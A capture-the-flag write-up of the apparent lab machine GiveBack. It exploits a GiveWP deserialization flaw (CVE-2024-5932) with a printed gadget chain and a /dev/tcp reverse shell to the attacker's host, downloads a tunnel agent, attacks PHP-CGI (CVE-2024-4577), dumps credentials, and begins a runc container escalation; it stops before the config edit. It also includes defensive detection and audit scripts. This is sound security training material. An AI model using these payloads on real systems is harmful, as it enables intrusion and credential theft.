GiveBack starts with WordPress enumeration, where a vulnerable plugin was identified that gave access to a Kubernetes pod. From that pod we set up tunneling to reach a new page, which revealed the PHP version and the presence of PHP-CGI; a vulnerability there was then leveraged to gain access to a second pod. Inside it we found Kubernetes credentials that allowed listing secrets, which in turn gave SSH access. Finally, privileges were escalated by creating a privileged container with runc.
❯ wpscan --url http://10.10.11.94/ -e vp,vt,cb,dbe,u --no-banner
[+] URL: http://10.10.11.94/ [10.10.11.94]
[+] Started: Sat Nov 1 13:11:50 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.28.0
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.11.94/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] WordPress readme found: http://10.10.11.94/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 6.8.1 identified (Insecure, released on 2025-04-30).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.11.94/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.8.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.11.94/, Match: 'WordPress 6.8.1'
[+] WordPress theme in use: bizberg
| Location: http://10.10.11.94/wp-content/themes/bizberg/
| Latest Version: 4.2.9.79 (up to date)
| Last Updated: 2024-06-09T00:00:00.000Z
| Readme: http://10.10.11.94/wp-content/themes/bizberg/readme.txt
| Style URL: http://10.10.11.94/wp-content/themes/bizberg/style.css?ver=6.8.1
| Style Name: Bizberg
| Style URI: https://bizbergthemes.com/downloads/bizberg-lite/
| Description: Bizberg is a perfect theme for your business, corporate, restaurant, ingo, ngo, environment, nature,...
| Author: Bizberg Themes
| Author URI: https://bizbergthemes.com/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 4.2.9.79 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.11.94/wp-content/themes/bizberg/style.css?ver=6.8.1, Match: 'Version: 4.2.9.79'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:02:38 <========================================================================================================> (652 / 652) 100.00% Time: 00:02:38
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:33 <=========================================================================================================> (137 / 137) 100.00% Time: 00:00:33
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods) Checking DB Exports - Time: 00:00:17 <===============================================================================================================> (75 / 75) 100.00% Time: 00:00:17
[i] No DB Exports Found.
[+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:03 <==========================================================================================================> (10 / 10) 100.00% Time: 00:00:03
[i] User(s) Identified:
[+] user
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.11.94/wp-json/wp/v2/users/?per_page=100&page=1
| Oembed API - Author URL (Aggressive Detection)
| - http://10.10.11.94/wp-json/oembed/1.0/embed?url=http://10.10.11.94/&format=json
| Author Sitemap (Aggressive Detection)
| - http://10.10.11.94/wp-sitemap-users-1.xml
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 1 13:15:31 2025
[+] Requests Done: 906
[+] Cached Requests: 31
[+] Data Sent: 234.88 KB
[+] Data Received: 606.596 KB
[+] Memory used: 282.289 MB
[+] Elapsed time: 00:03:40
❯
We run wpscan again, this time with the ap option to enumerate all plugins. It shows the give plugin at version 3.14.0. We found that the Unauthenticated PHP Object Injection to RCE vulnerability affects this plugin version.
[+] give
| Location: http://giveback.htb/wp-content/plugins/give/
| Last Updated: 2025-12-08T20:09:00.000Z
| [!] The version is out of date, the latest version is 4.13.2
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By:
| Urls In 404 Page (Passive Detection)
| Meta Tag (Passive Detection)
| Javascript Var (Passive Detection)
|
| Version: 3.14.0 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://giveback.htb/wp-content/plugins/give/assets/dist/css/give.css?ver=3.14.0
| Confirmed By:
| Meta Tag (Passive Detection)
| - http://giveback.htb/, Match: 'Give v3.14.0'
| Javascript Var (Passive Detection)
| - http://giveback.htb/, Match: '"1","give_version":"3.14.0","magnific_options"'
root - Kubernetes Pod WordPress
CVE-2024-5932
We clone the exploit repository EQSTLab/CVE-2024-5932 and use the RCE exploit, which builds and sends the object carrying the command to execute.
❯ python3 CVE-2024-5932-rce.py --help
Usage: CVE-2024-5932-rce.py [OPTIONS]
╭─ Options ────────────────────────────────────────────────────────────────────────────╮
│ * --url -u TEXT Specify a URL or domain for vulnerability detection │
│ (Donation-Form Page)[required] │
│ --cmd -c TEXT Specify the file to read from the server │
│ --help Show this message and exit. │
╰──────────────────────────────────────────────────────────────────────────────────────╯
❯
❯ python3 CVE-2024-5932-rce.py --url http://giveback.htb/donations/the-things-we-need/ --cmd 'bash -c "bash -i >& /dev/tcp/10.10.14.10/1339 0>&1"'
Author: EQST(Experts, Qualified Security Team)
Github: https://github.com/EQSTLab/CVE-2024-5932
Analysis base : https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/
=============================================================================================================
CVE-2024-5932 : GiveWP unauthenticated PHP Object Injection
description: The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
Arbitrary File Deletion
=============================================================================================================
[\] Exploit loading, please wait...
[+] Requested Data:
{'give-form-id': '17', 'give-form-hash': '66e843c3e0', 'give-price-id': '0', 'give-amount': '$10.00', 'give_first': 'Sarah', 'give_last': 'Carroll', 'give_email': 'qcoleman@example.com', 'give_title': 'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:51:"bash -c "bash -i >& /dev/tcp/10.10.14.10/1339 0>&1"";}}s:13:"\\0*\\0maxRetries";i:10;}}}}}}', 'give-gateway': 'offline', 'action': 'give_process_donation'}
We obtained a shell as root.
❯ rlwrap nc -lvp 1339
listening on [any] 1339 ...
connect to [10.10.14.10] from giveback.htb [10.10.11.94] 39423
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
<s-95b8ccd68-pd296:/opt/bitnami/wordpress/wp-admin$ whoami;id;pwd
whoami: cannot find name for user ID 1001
uid=1001 gid=0(root) groups=0(root),1001
/opt/bitnami/wordpress/wp-admin
<s-95b8ccd68-pd296:/opt/bitnami/wordpress/wp-admin$
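A defender-side check for the request shape shown in the "Requested Data" dump above, added here as an example and not code from the writeup or the exploit repository: it inspects a decoded give_process_donation form body, reports serialized PHP objects in fields that should only hold text, and lists dangerous callables stored as string members. The function names and the shortened sample chain are constructed for this example.

```python
import re
from typing import Dict, List

# Matches a serialized PHP object header, O:<len>:"<class>":<nprops>:{ , but only
# at the start of the value or right after a ';' or '{' separator, so ordinary
# text such as 'TODO:5:"hello"' is not reported.
_OBJ_HEADER = re.compile(r'(?:^|[;{])O:(\d+):"([^"]*)":\d+:\{')
_STR_MEMBER = re.compile(r's:(\d+):"([^"]*)";')

# PHP callables that, stored as a string member of an injected object, normally
# mean the gadget chain is being aimed at command execution.
_DANGEROUS_CALLABLES = {"shell_exec", "system", "exec", "passthru", "popen", "proc_open"}

# Donation form fields GiveWP treats as plain text; none should ever carry an object.
_TEXT_FIELDS = ("give_title", "give_first", "give_last", "give_email")


def php_object_classes(value: str) -> List[str]:
    """Return the class names of serialized PHP objects embedded in value."""
    classes = []
    for m in _OBJ_HEADER.finditer(value):
        declared, name = int(m.group(1)), m.group(2)
        # PHP stores the byte length of the class name; a mismatch means the
        # text only looks like serialization and is not a real object header.
        if len(name.encode()) == declared:
            classes.append(name)
    return classes


def dangerous_callables(value: str) -> List[str]:
    """Return dangerous PHP callables stored as serialized string members."""
    return [
        m.group(2)
        for m in _STR_MEMBER.finditer(value)
        if len(m.group(2).encode()) == int(m.group(1)) and m.group(2) in _DANGEROUS_CALLABLES
    ]


def assess_donation_request(params: Dict[str, str]) -> Dict[str, object]:
    """Inspect one decoded give_process_donation form body (hypothetical helper)."""
    finding: Dict[str, object] = {"suspicious": False, "fields": {}, "callables": []}
    if params.get("action") != "give_process_donation":
        return finding
    for field in _TEXT_FIELDS:
        value = params.get(field, "")
        classes = php_object_classes(value)
        if classes:
            finding["suspicious"] = True
            finding["fields"][field] = classes
            finding["callables"].extend(dangerous_callables(value))
    return finding


# Constructed samples. SAMPLE_INJECTED is a shortened form of the chain in the
# dump above; the other two show a normal title and a look-alike string.
SAMPLE_INJECTED = {
    "give-form-id": "17", "give_first": "Sarah", "give_last": "Carroll",
    "give_title": ('O:19:"Stripe\\StripeObject":1:{s:10:"\x00*\x00_values";a:1:{s:3:"foo";'
                   'O:33:"Give\\Vendors\\Faker\\ValidGenerator":2:{s:12:"\x00*\x00validator";'
                   's:10:"shell_exec";s:12:"\x00*\x00generator";N;}}}'),
    "action": "give_process_donation",
}
SAMPLE_BENIGN = {"give_title": "Mrs", "give_first": "Sarah", "action": "give_process_donation"}
SAMPLE_LOOKALIKE = {"give_title": 'TODO:5:"hello":1:{', "action": "give_process_donation"}

if __name__ == "__main__":
    for name, sample in (("injected", SAMPLE_INJECTED), ("benign", SAMPLE_BENIGN),
                         ("lookalike", SAMPLE_LOOKALIKE)):
        print(name, assess_donation_request(sample))
```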
Credentials
Inside, we found multiple credentials. In the WordPress configuration file:
# export TERM=xterm
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami/wordpress$ cat wp-config.php | grep -v "*"
<?php
define('DB_NAME', 'bitnami_wordpress');
define('DB_USER', 'bn_wordpress');
define('DB_PASSWORD', 'sW5sp4spa3u7RLyetrekE4oS');
define('DB_HOST', 'beta-vino-wp-mariadb:3306');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
define('AUTH_KEY', 'G7T{pv:!LZWUfekgP{A8TGFoL0,dMEU,&2B)ALoZS[8lo8V~+UGj@kWW%n^.vZgx');
define('LOGGED_IN_KEY', 'E5x5$T@Ggpti3+!/0G<>j<ylElF+}#Ny-7XZLw<#j[6|:oel9%OgxG|U}86./&&K');
define('NONCE_KEY', 'jM^E^Bx{vf-Ca~2$eXbH%RzD?=VmxWP9Z}-}J1E@N]t`GOP`8;<F;lYmGz8sh7sG');
define('AUTH_SALT', '+L>`[0~bk-bRDX 5F?ER)PUnB_ ZWSId=J {5XV:trSTp0u!~6shvPS`VP{f(@_Q');
define('LOGGED_IN_SALT', 'i?aJHLYu/rI%@MWZTw%Ch~%h|M/^Wum4$#4;qm(#zgQA+X3gKU?~B)@Mbgy %k}G');
# [.. cut ...]
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami/wordpress$
/secrets holds the database and WordPress credentials.
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/secrets$ ls -lah
total 4.0K
drwxrwsrwt 3 root 1001 140 Nov 1 18:56 .
drwxr-xr-x 1 root root 4.0K Nov 1 19:28 ..
drwxr-sr-x 2 root 1001 100 Nov 1 18:56 ..2025_11_01_18_56_41.2742971764
lrwxrwxrwx 1 root 1001 32 Nov 1 18:56 ..data -> ..2025_11_01_18_56_41.2742971764
lrwxrwxrwx 1 root 1001 23 Nov 1 18:56 mariadb-password -> ..data/mariadb-password
lrwxrwxrwx 1 root 1001 28 Nov 1 18:56 mariadb-root-password -> ..data/mariadb-root-password
lrwxrwxrwx 1 root 1001 25 Nov 1 18:56 wordpress-password -> ..data/wordpress-password
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/secrets$ cat mariadb-password;echo
sW5sp4spa3u7RLyetrekE4oS
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/secrets$ cat mariadb-root-password;echo
sW5sp4syetre32828383kE4oS
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/secrets$ cat wordpress-password;echo
O8F7KR5zGi
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/secrets$
WordPress Database
In the WordPress database we found a single registered user.
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$ mariadb -h beta-vino-wp-mariadb -P "3306" -u "bn_wordpress" -p"sW5sp4spa3u7RLyetrekE4oS" bitnami_wordpress -e "show databases;"
Database
bitnami_wordpress
information_schema
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$ mariadb -h beta-vino-wp-mariadb -P "3306" -u "bn_wordpress" -p"sW5sp4spa3u7RLyetrekE4oS" bitnami_wordpress -e "use bitnami_wordpress;show tables;"
Tables_in_bitnami_wordpress
wp_actionscheduler_actions
wp_actionscheduler_claims
wp_actionscheduler_groups
wp_actionscheduler_logs
wp_aioseo_cache
wp_commentmeta
wp_comments
# [... cut ..]
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_termmeta
wp_terms
wp_usermeta
wp_users
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$ mariadb -h beta-vino-wp-mariadb -P "3306" -u "bn_wordpress" -p"sW5sp4spa3u7RLyetrekE4oS" bitnami_wordpress -e "use bitnami_wordpress; select * from wp_users;"
ID user_login user_pass user_nicename user_email user_url user_registered user_activation_key user_status display_name
1 user $P$Bm1D6gJHKylnyyTeT0oYNGKpib//vP. user user@example.com http://127.0.0.1 2024-09-21 22:18:28 0 babywyrm
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$
WordPress Admin
In /opt/bitnami we discovered the wp-cli tool.
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami$ ls -lah
total 44K
drwxr-xr-x 10 root root 4.0K Jun 20 08:14 .
drwxr-xr-x 3 root root 4.0K Jun 20 08:14 ..
-rw-r--r-- 1 root root 814 Jun 20 08:14 .bitnami_components.json
drwxrwxr-x 17 root root 4.0K Jun 20 08:14 apache
lrwxrwxrwx 1 root root 6 Jun 20 08:14 apache2 -> apache
drwxr-xr-x 6 root root 4.0K Jun 2 16:24 common
drwxr-xr-x 2 root root 4.0K Jun 20 08:14 licenses
drwxr-xr-x 6 root root 4.0K Jun 20 08:14 mysql
drwxr-xr-x 13 root root 4.0K Jun 20 08:14 php
drwxr-xr-x 7 root root 4.0K Jun 20 08:14 scripts
drwxrwsr-x 6 1001 1001 4.0K Nov 1 19:28 wordpress
drwxr-xr-x 7 root root 4.0K Jun 20 08:14 wp-cli
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami$
WP-CLI 2.12.0
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami$
With it, it is possible to create an administrator user in WordPress.
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami$ wp user create sckull sckull@giveback.htb --role=administrator --user_pass=5upp3rP455
Success: Created user 2.
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami$
This lets us log in to the WordPress panel. Inside we found no further relevant information.
Intranet
The environment variables point to an intranet 'service' on port 5000.
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$ env
# [...]
LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241
LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000
KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443
LEGACY_INTRANET_SERVICE_SERVICE_PORT=5000
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_ADDR=10.43.2.241
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_SERVICE_HOST=10.43.0.1
KUBERNETES_PORT=tcp://10.43.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PROTO=tcp
LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000
# [...]
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$
Using PHP we make a GET request through file_get_contents().
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$ php -r 'file_put_contents("file", file_get_contents("http://10.43.2.241:5000"));'
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$ cat file
<!DOCTYPE html>
<html>
<head>
<title>GiveBack LLC Internal CMS</title>
<!-- Developer note: phpinfo accessible via debug mode during migration window -->
<style>
body { font-family: Arial, sans-serif; margin: 40px; background: #f9f9f9; } .header { color: #333; border-bottom: 1px solid #ccc; padding-bottom: 10px; } .info { background: #eef; padding: 15px; margin: 20px 0; border-radius: 5px; } .warning { background: #fff3cd; border: 1px solid #ffeeba; padding: 10px; margin: 10px 0; } .resources { margin: 20px 0;} .resources li { margin: 5px 0;} a { color: #007bff; text-decoration: none; } a:hover { text-decoration: underline;} </style>
</head>
<body>
<div class="header">
<h1>🏢 GiveBack LLC Internal CMS System</h1>
<p><em>Development Environment – Internal Use Only</em></p>
</div>
<div class="warning">
<h4>⚠️ Legacy Notice</h4>
<p>**SRE** - This system still includes legacy CGI support. Cluster misconfiguration may likely expose internal scripts.</p>
</div>
<div class="resources">
<h3>Internal Resources</h3>
<ul>
<li><a href="/admin/">/admin/</a> — VPN Required</li>
<li><a href="/backups/">/backups/</a> — VPN Required</li>
<li><a href="/runbooks/">/runbooks/</a> — VPN Required</li>
<li><a href="/legacy-docs/">/legacy-docs/</a> — VPN Required</li>
<li><a href="/debug/">/debug/</a> — Disabled</li>
<li><a href="/cgi-bin/info">/cgi-bin/info</a> — CGI Diagnostics</li>
<li><a href="/cgi-bin/php-cgi">/cgi-bin/php-cgi</a> — PHP-CGI Handler</li>
<li><a href="/phpinfo.php">/phpinfo.php</a></li>
<li><a href="/robots.txt">/robots.txt</a> — Crawlers: Disallowed</li>
</ul>
</div>
<div class="info">
<h3>Developer Note</h3>
<p>This CMS was originally deployed on Windows IIS using <code>php-cgi.exe</code>.
During migration to Linux, the Windows-style CGI handling was retained to ensure
legacy scripts continued to function without modification.</p>
</div>
</body>
</html>
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$
htmledit shows us a simple page. It mentions CGI. A comment also says phpinfo is accessible via debug mode.
Tunneling
We downloaded the ligolo-ng agent, made it executable and ran it with the -ignore-cert flag.
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/tmp$ php -r 'file_put_contents("ag", file_get_contents("http://10.10.14.10/agent_linux"));'
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/tmp$ chmod +x ag
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/tmp$ ./ag -connect 10.10.14.10:443 -ignore-cert
time="2025-11-01T20:47:54Z" level=warning msg="warning, certificate validation disabled"
time="2025-11-01T20:47:54Z" level=info msg="Connection established" addr="10.10.14.10:443"
Locally we ran the proxy with the -selfcert flag, selected the session, created an interface and added the routes.
As mentioned, debug mode is available: appending ?debug lets us view the information. It shows PHP version 8.3.3 and the phpinfo directory at /var/www/html.
CVE-2024-4577
Researching the PHP version together with php-cgi, we found an RCE vulnerability (CVE-2024-4577) affecting PHP 8.3, mainly on Windows (Unmasking the new persistent attacks on Japan); in this case, however, the system is Linux.
Version 8.3.3 appears to fall within the vulnerable range 8.3.* < 8.3.8 (CVE-2024-4577 Exploits in the Wild One Day After Disclosure). We sent a request like the PoC (1,2,3,4) executing phpinfo(); the response showed no content.
With that we gained root access on the Intranet pod.
❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.10] from giveback.htb [10.10.11.94] 3321
/bin/sh: can't access tty; job control turned off
/var/www/html/cgi-bin # whoami;id;pwd
root
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/var/www/html/cgi-bin
/var/www/html/cgi-bin #
phpinfo.php shows the 'protection'.
/var/www/html # cat phpinfo.php
<?php
// Development phpinfo - Remove in production!
// Last updated: 2024-06-15
if (!isset($_GET['debug']) && $_SERVER['REMOTE_ADDR'] !== '127.0.0.1') { // Simple protection, but bypassable
    die('Access restricted');
}
echo "<h1>PHP Configuration - Development Environment</h1>";
echo "<p style='color: red;'><strong>WARNING:</strong> This file should not be accessible in production!</p>";
echo "<hr>";
phpinfo();
?>
/var/www/html #
Kubernetes Access
The environment variables again point to Kubernetes, and we also found the "credentials" for a user account (Service Accounts).
❯ ssh babywyrm@giveback.htb
The authenticity of host 'giveback.htb (10.10.11.94)' can't be established.
ED25519 key fingerprint is SHA256:QW0UEukNwOzzXzOIYR311JYiuhYUEv8FYbRgwiKZ35g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'giveback.htb' (ED25519) to the list of known hosts.
babywyrm@giveback.htb's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-124-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Nov 1 22:45:50 2025 from 10.10.14.10
babywyrm@giveback:~$ whoami;id;pwd
babywyrm
uid=1000(babywyrm) gid=1000(babywyrm) groups=1000(babywyrm),4(adm),30(dip)
/home/babywyrm
babywyrm@giveback:~$ ls
user.txt
babywyrm@giveback:~$ cat user.txt
a8da1b9773f7d59fe54085a39e0f079c
babywyrm@giveback:~$
Privesc
The user can run the /opt/debug command as root.
babywyrm@giveback:~$ sudo -l -l
Matching Defaults entries for babywyrm on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0, timestamp_timeout=20
User babywyrm may run the following commands on localhost:
Sudoers entry:
RunAsUsers: ALL
Options: !authenticate
Commands:
!ALL
Sudoers entry:
RunAsUsers: ALL
Commands:
/opt/debug
babywyrm@giveback:~$
The command requires a password to run.
# c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T
babywyrm@giveback:~$ sudo /opt/debug
Validating sudo...
Please enter the administrative password:
Both passwords verified. Executing the command...
NAME:
runc - Open Container Initiative runtime
runc is a command line client for running applications packaged according to
the Open Container Initiative (OCI) format and is a compliant implementation of the
Open Container Initiative specification.
runc integrates well with existing process supervisors to provide a production
container runtime environment for applications. It can be used with your
existing process monitoring tools and the container will be spawned as a
direct child of the process supervisor.
Containers are configured using bundles. A bundle for a container is a directory
that includes a specification file named "config.json" and a root filesystem.
The root filesystem contains the contents of the container.
To start a new instance of a container:
# runc run [ -b bundle ] <container-id>
Where "<container-id>" is your name for the instance of the container that you
are starting. The name you provide for the container instance must be unique on
your host. Providing the bundle directory using "-b" is optional. The default
value for"bundle" is the current directory.
USAGE:
runc.amd64.debug [global options] command [command options] [arguments...]
VERSION:
1.1.11
commit: v1.1.11-0-g4bccb38c
spec: 1.0.2-dev
go: go1.20.12
libseccomp: 2.5.4
COMMANDS:
checkpoint checkpoint a running container
create create a container
delete delete any resources held by the container often used with detached container
events display container events such as OOM notifications, cpu, memory, and IO usage statistics
exec execute new process inside the container
kill kill sends the specified signal (default: SIGTERM) to the container's init process
list lists containers started by runc with the given root
pause pause suspends all processes inside the container
ps ps displays the processes running inside a container
restore restore a container from a previous checkpoint
resume resumes all processes that have been previously paused
run create and run a container
spec create a new specification file
start executes the user defined process in a created container
state output the state of a container
update update container resource constraints
features show the enabled features
help, h Shows a list of commands or help for one command
GLOBAL OPTIONS:
--debug enable debug logging
--log value set the log file to write runc logs to (default is '/dev/stderr')
--log-format value set the log format ('text' (default), or 'json') (default: "text")
--root value root directory for storage of container state (this should be located in tmpfs) (default: "/run/runc")
--criu value path to the criu binary used for checkpoint and restore (default: "criu")
--systemd-cgroup enable systemd cgroup support, expects cgroupsPath to be of form "slice:prefix:name" for e.g. "system.slice:runc:434234"
--rootless value ignore cgroup permission errors ('true', 'false', or 'auto') (default: "auto")
--help, -h show help
--version, -v print the version
babywyrm@giveback:~$
It is possible to escalate privileges with runc by creating a new container that mounts the host root (/). To do so a configuration file is needed; running spec creates the config.json file.
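An audit of the OCI config.json that runc spec produces, added here as an example and not part of the original writeup: it flags the settings that turn a bundle into a host-takeover vehicle (root path or bind mount pointing at the host filesystem, writable root, uid 0 without a user namespace, CAP_SYS_ADMIN). Both sample configs are constructed; the default-like one mirrors the shape of a runc spec file in abridged form.

```python
import json
import os
from typing import Dict, List

# Host paths that must never be bind-mounted into an untrusted container;
# a mount of "/" hands the container the entire host filesystem.
_SENSITIVE_SOURCES = ("/", "/etc", "/root", "/var/run/docker.sock", "/run/runc")


def _is_sensitive(path: str) -> bool:
    norm = os.path.normpath(path)
    if norm in _SENSITIVE_SOURCES:
        return True
    return any(norm.startswith(p + "/") for p in _SENSITIVE_SOURCES if p != "/")


def audit_oci_config(config: Dict) -> List[str]:
    """Return human-readable findings for one OCI runtime spec (config.json)."""
    findings: List[str] = []
    root = config.get("root", {})
    path = root.get("path", "")
    if path and os.path.normpath(path) == "/":
        findings.append("root.path is the host filesystem (/)")
    if root.get("readonly") is not True:
        findings.append("root filesystem is writable (readonly missing or false)")
    for mount in config.get("mounts", []):
        src = mount.get("source", "")
        if mount.get("type") in ("bind", "none") and _is_sensitive(src):
            findings.append(f"bind mount of sensitive host path {src} at {mount.get('destination')}")
    namespaces = {ns.get("type") for ns in config.get("linux", {}).get("namespaces", [])}
    process = config.get("process", {})
    if process.get("user", {}).get("uid", 0) == 0 and "user" not in namespaces:
        findings.append("process runs as uid 0 without a user namespace")
    if "CAP_SYS_ADMIN" in process.get("capabilities", {}).get("bounding", []):
        findings.append("CAP_SYS_ADMIN in bounding capability set")
    return findings


def audit_file(path: str) -> List[str]:
    """Audit a config.json on disk."""
    with open(path, encoding="utf-8") as fh:
        return audit_oci_config(json.load(fh))


# Constructed samples. DEFAULT_LIKE mirrors (abridged) the shape runc spec writes;
# TAMPERED is the kind of edit an auditor should catch before the bundle is run.
DEFAULT_LIKE = json.loads("""{
  "ociVersion": "1.0.2-dev",
  "process": {"user": {"uid": 0, "gid": 0}, "args": ["sh"], "cwd": "/",
              "capabilities": {"bounding": ["CAP_AUDIT_WRITE", "CAP_KILL", "CAP_NET_BIND_SERVICE"]}},
  "root": {"path": "rootfs", "readonly": true},
  "mounts": [{"destination": "/proc", "type": "proc", "source": "proc"}],
  "linux": {"namespaces": [{"type": "pid"}, {"type": "network"}, {"type": "ipc"},
                           {"type": "uts"}, {"type": "mount"}]}
}""")
TAMPERED = json.loads("""{
  "ociVersion": "1.0.2-dev",
  "process": {"user": {"uid": 0, "gid": 0}, "args": ["sh"], "cwd": "/",
              "capabilities": {"bounding": ["CAP_SYS_ADMIN", "CAP_KILL"]}},
  "root": {"path": "/", "readonly": false},
  "mounts": [{"destination": "/host", "type": "bind", "source": "/", "options": ["rbind", "rw"]}],
  "linux": {"namespaces": [{"type": "pid"}, {"type": "mount"}]}
}""")

if __name__ == "__main__":
    import sys
    for label, result in (("default-like", audit_oci_config(DEFAULT_LIKE)),
                          ("tampered", audit_oci_config(TAMPERED))):
        print(label, result or ["no findings"])
    if len(sys.argv) > 1:
        print(sys.argv[1], audit_file(sys.argv[1]) or ["no findings"])
```

Run it with a path argument to audit a real bundle; even the untouched runc spec output is reported for running uid 0 without a user namespace.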
# c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T
babywyrm@giveback:~$ sudo /opt/debug spec
Validating sudo...
Please enter the administrative password:
Both passwords verified. Executing the command...
babywyrm@giveback:~$ ls
config.json user.txt
babywyrm@giveback:~$
We modify the JSON file by adding the following: